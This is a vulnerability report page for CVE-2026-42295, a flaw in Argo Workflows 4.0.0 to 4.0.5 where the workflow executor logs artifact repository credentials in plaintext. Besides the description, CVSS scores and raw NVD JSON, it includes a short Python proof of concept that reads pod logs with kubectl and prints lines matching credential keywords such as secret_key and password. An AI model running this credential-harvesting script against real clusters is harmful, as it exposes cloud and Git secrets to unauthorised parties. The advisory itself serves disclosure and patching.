Security Vulnerability Report
中文
CVE-2026-42295 CVSS 4.9 MEDIUM

CVE-2026-42295

Published: 2026-05-09 04:16:25
Last Modified: 2026-05-15 19:40:36
Source: [email protected]

Description

Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. From version 4.0.0 to before version 4.0.5, the workflow executor logs all artifact repository credentials (S3 access keys, secret keys, GCS service account keys, Azure account keys, Git passwords, etc.) in plaintext on artifact operation. Any user with read access to workflow pod logs can extract these credentials. This issue has been patched in version 4.0.5.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:argoproj:argo_workflows:*:*:*:*:*:go:*:* - VULNERABLE
Argo Workflows >= 4.0.0, < 4.0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC script to demonstrate checking logs for leaked credentials import subprocess def exploit_cve_2026_42295(namespace, pod_name): print(f"[*] Checking logs for pod {pod_name} in namespace {namespace}...") try: # Simulate fetching logs using kubectl cmd = ["kubectl", "logs", "-n", namespace, pod_name] result = subprocess.run(cmd, capture_output=True, text=True, check=True) logs = result.stdout # Define patterns for sensitive keys sensitive_keywords = [ "access_key", "secret_key", "password", "service_account", "account_key", "token" ] print("[+] Analyzing logs for plaintext credentials...") found = False for line in logs.split('\n'): for keyword in sensitive_keywords: if keyword in line.lower(): print(f"[!] Found potential credential leak: {line.strip()}") found = True break if not found: print("[-] No obvious credentials found in current logs.") except subprocess.CalledProcessError as e: print(f"[-] Error executing command: {e}") except Exception as e: print(f"[-] An error occurred: {e}") # Example usage (requires kubectl context and permissions) # exploit_cve_2026_42295("argo", "workflow-hello-world-xyz")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42295", "sourceIdentifier": "[email protected]", "published": "2026-05-09T04:16:25.367", "lastModified": "2026-05-15T19:40:36.453", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. From version 4.0.0 to before version 4.0.5, the workflow executor logs all artifact repository credentials (S3 access keys, secret keys, GCS service account keys, Azure account keys, Git passwords, etc.) in plaintext on artifact operation. Any user with read access to workflow pod logs can extract these credentials. This issue has been patched in version 4.0.5."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-522"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:argoproj:argo_workflows:*:*:*:*:*:go:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.0.5", "matchCriteriaId": "675D5F2B-A490-42EB-B1A1-0CE05D2BB4CF"}]}]}], "references": [{"url": "https://github.com/argoproj/argo-workflows/releases/tag/v4.0.5", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-7vf8-2cr6-54mf", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-7vf8-2cr6-54mf", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.